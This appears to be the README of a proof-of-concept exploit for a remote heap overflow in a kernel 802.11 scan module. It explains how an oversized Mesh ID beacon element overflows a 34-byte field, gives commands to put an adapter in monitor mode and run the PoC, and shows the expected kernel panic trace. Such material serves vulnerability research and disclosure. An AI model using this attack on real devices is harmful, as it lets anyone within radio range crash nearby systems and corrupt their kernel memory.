# DF-0393 PoC — Remote Mesh ID heap overflow in ieee80211_scan_sta.c

## Summary

Sends a crafted 802.11 beacon with an oversized Mesh ID information element
(length byte = 200, exceeding the 32-byte maximum). The scan subsystem
copies `2 + 200 = 202` bytes into the 34-byte `se_meshid` field, overflowing
by ~168 bytes into adjacent heap-allocated struct fields including IE
pointers and list links.

## Build

```
pip install scapy
```

## Run

```
# Put WiFi adapter in monitor mode
sudo airmon-ng start wlan0
# Run the PoC on the monitor interface
sudo python3 poc.py --iface wlan0mon --count 100
```

## Expected output

The victim kernel panics with a page fault when dereferencing a corrupted
pointer from the overflowed `se_ies` struct or `se_list`/`se_hash` links:

```
Fatal trap 12: page fault while in kernel mode
virtual address = 0xdeadbeef41414141
cpuid = 0
KDB: stack backtrace:
#0  mi_switch+0x...
#1  sta_add+0x... at ieee80211_scan_sta.c:312
#2  sta_rx_mgmt+0x... at ieee80211_scan_sta.c:...
#3  ieee80211_deliver_l2+0x...
#4  ieee80211_input+0x...
```

## How it works

1. `ieee80211_parse_beacon()` (`ieee80211_input.c:621-622`) stores the Mesh
   ID IE pointer without length validation.
2. `sta_add()` (`ieee80211_scan_sta.c:312`) executes
   `memcpy(ise->se_meshid, sp->meshid, 2 + sp->meshid[1])`.
3. `ise->se_meshid` is 34 bytes; the copy writes 202 bytes.
4. The 168 overflow bytes corrupt:
   - `se_ies` (struct of IE data pointers)
   - `se_age` (int)
   - `se_list` / `se_hash` (TAILQ/LIST link pointers)
5. When the scan table is subsequently walked (select_bss, sta_iterate,
   adhoc_age, ieee80211_ies_expand), corrupted pointers are dereferenced →
   kernel panic.

## Notes

- The victim interface must be in scanning mode (background scan runs
  automatically every few seconds when associated).
- `IEEE80211_SUPPORT_MESH` is compiled in by default in X86_64_GENERIC.
- This is the same class of bug as DF-0285 but in a different code path
  (generic beacon parser vs. mesh-specific receive path).
